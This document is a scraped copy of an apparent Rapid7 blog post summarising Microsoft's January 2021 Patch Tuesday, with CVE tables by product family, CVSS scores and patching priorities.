Windows Operating System vulnerabilities dominated this month's advisories, followed by Microsoft Office (which includes the SharePoint family of products), and lastly some from less frequent products such as Microsoft System Center and Microsoft SQL Server.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 65 \nESU | 35 \nMicrosoft Office | 11 \nDeveloper Tools | 5 \nSQL Server | 1 \nApps | 1 \nSystem Center | 1 \nAzure | 1 \nBrowser | 1 \n \n### [Microsoft Defender Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>) (CVE-2021-1647)\n\nCVE-2021-1647 is marked as a CVSS 7.8, actively exploited, remote code execution vulnerability in the Microsoft Malware Protection Engine (mpengine.dll), versions 1.1.17600.5 up to 1.1.17700.4. \n\nBy default, Microsoft's affected antimalware software automatically keeps the Microsoft Malware Protection Engine up to date. This means that no further action is needed to resolve this vulnerability unless non-standard configurations are used. Because the flaw is actively exploited, it is still worth confirming the engine version each endpoint reports against Microsoft's advisory, especially where engine updates are disabled, deferred or delivered offline. \n\nThis vulnerability affects Windows Defender or the supported Endpoint Protection pieces of the System Center family of products (2012, 2012 R2, and namesake version: Microsoft System Center Endpoint Protection).\n\n### Patching Windows Operating Systems Next\n\nAnother confirmation of the standard advice of prioritizing Operating System patches whenever possible is that 11 of the 13 top CVSS-scoring (CVSSv3 8.8) vulnerabilities addressed in this month's Patch Tuesday would be immediately covered through these means. As an interesting observation, the Windows Remote Procedure Call Runtime component appears to have been given extra scrutiny this month. 
This RPC Runtime component accounts for 9 of the 13 top CVSS-scoring vulnerabilities, along with half of the 10 Critical Remote Code Execution vulnerabilities being addressed.\n\n### More Work to be Done\n\nLastly, two minor points to note: this Patch Tuesday includes SQL Server, a family that is not typically covered during Patch Tuesdays, and, arguably more notable, it is a reminder that [Adobe Flash has officially reached end-of-life](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support>) and would already have been actively removed from all browsers via Windows Update.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1677](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1677>) | Azure Active Directory Pod Identity Spoofing Vulnerability | No | No | 5.5 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1705](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1705>) | Microsoft Edge (HTML-based) Memory Corruption Vulnerability | No | No | 4.2 | No \n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2020-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870>) | Visual Studio Remote Code Execution Vulnerability | No | No | 7 | Yes \n[CVE-2021-1725](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1725>) | Bot Framework SDK Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1723](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1723>) | ASP.NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Developer Tools Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1651>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1680](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1680>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-1715](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1715>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1716](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1716>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1641>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1717](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1717>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1718](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1718>) | Microsoft SharePoint Server Tampering Vulnerability | No | No | 8 | No \n[CVE-2021-1707](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1707>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-1712](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1712>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1719](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1719>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1711](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1711>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1713](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1713>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1714](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1714>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server 
Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1636>) | Microsoft SQL Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647>) | Microsoft Defender Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1681](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1681>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1686>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1687>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1690](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1690>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1646>) | Windows WLAN Service Elevation of Privilege Vulnerability | No | No | 6.6 | No \n[CVE-2021-1650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1650>) | Windows Runtime C++ Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1663](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1663>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | 
No | 5.5 | Yes \n[CVE-2021-1670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1670>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1672>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1689](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1689>) | Windows Multipoint Management Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1682>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1697](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1697>) | Windows InstallService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1662>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1703](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1703>) | Windows Event Logging Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1645](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1645>) | Windows Docker Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-1637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1637>) | Windows DNS Query Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1638>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 7.7 | No 
\n[CVE-2021-1683](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1683>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1684](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1684>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1642>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1685](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1685>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1648>) | Microsoft splwow64 Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-1710](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1710>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1691](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1691>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1692](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1692>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1643>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1644>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## Windows Apps Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-1669](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1669>) | Windows Remote Desktop Security Feature Bypass Vulnerability | No | No | 8.8 | Yes \n \n## Windows ESU Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1709](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1709>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1694](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1694>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1702](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1702>) | Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1674>) | Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability | No | No | 8.8 | No \n[CVE-2021-1695](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1695>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1676>) | Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1706](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1706>) | Windows LUAFV Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1661](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1661>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1704](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1704>) | Windows Hyper-V Elevation of Privilege Vulnerability | 
No | No | 7.3 | No \n[CVE-2021-1696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1696>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1708>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1657](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1657>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1679](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1679>) | Windows CryptoAPI Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-1652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1652>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1653>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1654>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1655](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1655>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1659](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1659>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1688>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1693](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1693>) | Windows CSC Service Elevation of Privilege Vulnerability 
| No | No | 7.8 | No \n[CVE-2021-1699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1699>) | Windows (modem.sys) Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1656>) | TPM Device Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1658](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1658>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1660>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1666](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1666>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1667](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1667>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1673](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1673>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1664](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1664>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1671](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1671>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1700>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No 
\n[CVE-2021-1701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1701>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1678](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1678>) | NTLM Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-1668](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1668>) | Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1665](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1665>) | GDI+ Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1649>) | Active Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Summary Graphs\n\n\n\n_Note: Graph data reflects the data presented by Microsoft's CVRF at the time of writing._", "cvss3": {}, "published": "2021-01-12T23:59:00", "type": "rapid7blog", "title": "Patch Tuesday - January 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-26870", "CVE-2021-1636", "CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1641", "CVE-2021-1642", "CVE-2021-1643", "CVE-2021-1644", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1677", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", 
"CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1703", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1707", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710", "CVE-2021-1711", "CVE-2021-1712", "CVE-2021-1713", "CVE-2021-1714", "CVE-2021-1715", "CVE-2021-1716", "CVE-2021-1717", "CVE-2021-1718", "CVE-2021-1719", "CVE-2021-1723", "CVE-2021-1725"], "modified": "2021-01-12T23:59:00", "id": "RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "href": "https://blog.rapid7.com/2021/01/12/patch-tuesday-january-2021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}